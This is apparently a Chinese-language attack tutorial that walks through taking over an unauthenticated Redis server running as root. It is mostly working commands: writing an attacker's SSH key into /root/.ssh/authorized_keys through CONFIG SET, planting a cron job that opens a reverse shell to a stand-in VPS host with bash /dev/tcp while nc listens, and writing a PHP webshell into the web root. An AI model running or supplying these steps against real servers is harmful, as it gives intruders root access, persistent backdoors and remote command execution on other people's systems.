(1)写ssh-keygen公钥然后使用私钥登陆
在以下条件下,可以利用此方法
Redis服务使用ROOT账号启动
服务器开放了SSH服务,而且允许使用密钥登录,即可远程写入一个公钥,直接登录远程服务器。
1:本地建立ssh的密钥
ssh-keygen -t rsa
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): ./id_rsa
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in ./id_rsa.
Your public key has been saved in ./id_rsa.pub.
The key fingerprint is:
SHA256:P24CPwgr75TtlEAgIY95v7mcAWpd7S6N1KGhi7hHO6s root@kali
The key’s randomart image is:
±–[RSA 3072]----+
|+… |
|.= . |
|o o . |
| . o … |
| . +.+.S |
| .oooOoo . |
|oo.oOo*= o |
|o.=+.Oo.+… |
|E+.** o. +. |
±—[SHA256]-----+
2:然后写入公钥内容
(echo -e “\n\n”;cat id_rsa.pub;echo -e “\n\n”)>test.txt
3:把内容远程到redis服务器上
cat test.txt |redis-cli -h IP -x set test
4:登录远程服务器,查看公钥
redis-cli -h IP
keys *
get test
5:查看当前路径和名称
config get dir
config get dbfilename
5:修改路径
config set dir “/root/.ssh/”
6:修改保存的名称
config set dbfilename “authorized_keys”
7:保存
save
8:连接
ssh -i id_rsa IP -l root
9:删除key
(2)利用计划任务执行命令反弹shell
1:攻击机监听端口
nc -lvnp PORT
2:redis执行命令
redis-cil -h IP
set x “\n* * * * * bash -i >& /dev/tcp/VPS/PORT 0>&1\n”
3:修改路径
config set dir /var/spool/cron/
4:修改保存的名称
config set dbfilename root
5:保存
save
(3)往web物理路径写webshell
config set dir /var/www/html/
config set dbfilename shell.php
set x “<?php phpinfo();?>”
save